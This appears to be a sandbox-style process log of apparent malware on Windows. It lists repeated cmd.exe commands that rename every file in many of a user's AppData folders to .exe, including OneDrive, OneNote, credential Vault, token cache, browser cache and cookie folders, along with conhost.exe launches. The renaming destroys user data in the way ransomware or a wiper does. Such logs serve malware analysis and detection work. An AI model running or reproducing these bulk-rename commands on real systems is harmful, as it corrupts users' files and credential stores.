"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kn\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ko\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kok\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ku-Arab\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ky\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lb-LU\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lt\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lv\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mi-NZ\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ml-IN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mn\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mr\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ms\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mt-MT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nb-NO\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ne-NP\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nn-NO\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nso-ZA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\or-IN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa-Arab-PK\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\platforms\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\prs-AF\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-BR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-PT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quc\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quz-PE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ro\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ru\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\rw\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sd-Arab-PK\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\si-LK\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sq\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-BA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-RS\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Latn-RS\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sv\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sw\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ta\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\te\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tg\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\th\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ti\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tk-TM\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tn-ZA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tt\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ug\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ur\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uz-Latn-UZ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\vi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\wo\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\xh-ZA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\yo-NG\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-CN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-TW\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zu-ZA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\de\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\es\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\fr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\hu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\it\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ja\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ko\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\nl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-BR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-PT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ru\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\sv\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\tr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-CN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-TW\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick.2\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls.2\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Extras\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Layouts\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Templates.2\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Window.2\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\Flat\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\setup\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\setup\logs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\Backup\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\Desktop\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\InPrivate\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\InPrivate\Desktop\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileRoaming\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\0\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\1033\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\AppCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\CloudStore\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatUaCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IEDownloadHistory\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\RoamingTiles\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\SettingSync\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\AppCache\YT4NKTBJ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\NotifyIcon\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024061120240612\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatCache\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatUaCache\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.IE5\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Virtualized\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\E9YVC3IR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G7AAJOBN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\REQ5K173\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\XIQH11PJ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\DNTException\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\ESE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\wpnidm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\*.*" "*.exe"

C:\Windows\System32\cmd.exe

